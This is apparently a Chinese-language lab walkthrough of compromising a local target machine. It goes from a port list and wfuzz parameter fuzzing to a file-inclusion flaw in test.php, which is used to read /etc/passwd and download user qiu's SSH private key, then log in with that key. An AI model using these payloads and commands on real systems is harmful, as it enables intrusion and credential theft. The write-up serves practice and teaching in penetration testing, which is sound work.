????????第一步:確定靶機IP為192.168.40.129
????????第二步:掃描后臺及開放端口
#開放端口
22 --- ssh
25 --- SMTP簡單郵件傳輸協議
80 --- HTTP萬維網傳輸信息協議
110 --- POP3郵件協議3
139 --- NetBIOS服務
443 --- https服務
445 --- SMB協議
3306 --- Mysql
8080 --- Internet 信息服務
????????第三步:嘗試訪問掃到的端口和文件
????????第四步:嘗試使用kali自帶的FUZZ
#使用kali自帶的FUZZ
wfuzz -u "http://192.168.40.129/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
????????第五步:嘗試訪問/etc/passwd敏感文件,發現qiu用戶,且權限為1000
#/etc/passwd
http://192.168.40.129/test.php?file=/etc/passwd
????????第六步:嘗試查看用戶qiu的 ssh 密鑰
#查看用戶qiu的 ssh 密鑰
http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa
????????第七步:嘗試利用文件包含來得到qiu的ssh私鑰文件,并使用cat查看
#得到ssh私鑰文件
curl http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa
????????第八步:給予密鑰文件權限為600,以正常使用
chmod 600 id_rsa
????????第九步:使用這個私鑰登錄qiu用戶,發現連接成功
ssh -i id_rsa qiu@192.168.40.129
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? FROM? IYU_